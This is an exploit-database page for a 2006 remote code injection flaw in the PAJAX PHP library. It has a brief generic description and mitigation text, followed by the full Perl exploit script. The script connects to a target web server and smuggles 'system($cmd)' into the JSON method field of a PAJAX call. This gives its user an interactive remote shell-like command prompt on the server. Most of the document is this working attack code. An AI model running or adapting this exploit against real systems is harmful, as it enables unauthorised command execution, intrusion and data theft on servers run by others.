header-logo
Suggest Exploit
vendor:
N/A
by:
Stoney
9.3
CVSS
HIGH
Remote Code Injection
78
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PAJAX Remote Code Injection

PAJAX Remote Code Injection is a vulnerability that allows an attacker to inject malicious code into a vulnerable web application. The vulnerability is caused by improper input validation of user-supplied data. The attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable web application. The malicious code is then executed on the server, allowing the attacker to gain access to sensitive information or execute arbitrary code.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being used in the application. Additionally, the application should be configured to use the latest security patches and updates.
Source

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;

print "PAJAX Remote Code Injection - code by: Stoney - exploit found
by: RedTeam\n";

if ($ARGV[0] && $ARGV[1])
{
 $host = $ARGV[0];
 $path = $ARGV[1];
 $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
PeerPort => "80") || die "connecterror\n";
 while (1) {
   print '['.$host.']# ';
   $cmd = <STDIN>;
   chop($cmd);
   last if ($cmd eq 'exit');
   $ajaxdata = "{\"id\": \"bb2238f1186dad8d6370d2bab5f290f71\", \"className\": \"Calculator\", \"method\": \"add(1,1);system($cmd);\$obj->add\", \"params\": [\"1\", \"5\"]}";

   print $sock "POST ".$path." HTTP/1.1\n";
   print $sock "Host: ".$host."\n";
   print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
   print $sock "Content-Type: text/json\n";
   print $sock "Content-Length:".length($ajaxdata)."\n\n".$ajaxdata;
   while ($ans = <$sock>)
      {
       print "$ans";
      }
  }
 }
else {
 print "Usage: perl ajax.pl [host] [path_to_ajax]\n\n";
exit;
}

# milw0rm.com [2006-04-13]

Navigation

Suggest Exploit

Services By CQR